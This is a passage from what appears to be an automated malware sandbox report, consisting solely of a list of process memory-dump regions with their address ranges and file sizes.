                                                                                                                                                                                                                                                      • memory/4132-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4140-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4232-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4232-359-0x0000000000D40000-0x0000000000D42000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                      • memory/4252-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4256-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4276-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4276-205-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                      • memory/4320-306-0x000002AD05B60000-0x000002AD05C2F000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        828KB

                                                                                                                                                                                                                                                      • memory/4320-310-0x000002AD05AF0000-0x000002AD05B5F000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        444KB

                                                                                                                                                                                                                                                      • memory/4320-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4436-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4560-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4612-430-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                      • memory/4612-414-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4624-301-0x00000000056A0000-0x0000000005CA6000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        6.0MB

                                                                                                                                                                                                                                                      • memory/4624-263-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                                                      • memory/4624-267-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4632-309-0x0000000005540000-0x0000000005A3E000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                                      • memory/4632-268-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4632-264-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                                                      • memory/4648-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4648-256-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                      • memory/4692-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4704-588-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4732-417-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                      • memory/4732-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4760-270-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-325-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-320-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-294-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-329-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-330-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-331-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-290-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-333-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4760-295-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-273-0x0000000003970000-0x00000000039AC000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        240KB

                                                                                                                                                                                                                                                      • memory/4760-324-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-316-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-328-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-327-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-326-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-317-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-286-0x00000000023E0000-0x00000000023E1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-283-0x00000000023D0000-0x00000000023D1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4760-314-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/4772-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4832-322-0x0000000005740000-0x0000000005D46000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        6.0MB

                                                                                                                                                                                                                                                      • memory/4832-300-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4840-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4944-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/4992-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5020-433-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        436KB

                                                                                                                                                                                                                                                      • memory/5020-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5052-544-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5100-379-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                      • memory/5100-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5144-540-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5152-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5216-438-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5228-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5480-594-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5592-531-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5676-528-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5724-563-0x00007FF7CC9C4060-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5768-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5908-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5956-530-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/5964-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6044-498-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6064-536-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                      • memory/6096-576-0x0000000000000000-mapping.dmp